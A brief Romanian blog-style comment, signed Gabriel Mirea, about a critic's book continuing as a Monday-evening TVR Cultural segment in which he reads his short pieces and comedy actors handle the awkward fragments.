Cartea aceasta are o continuare interesantă. În fiecare luni seară, pe TVR Cultural de la ora 21 criticul citește una dintre tabletele sale, iar fragmentele strâmbe le lasă în seama actorilor de comedie. A început ofensiva contra rataților sadea. E oare o poziție singulară lupta contra legiunii aberanților?

Ceva de genu`

Gabriel Mirea

"));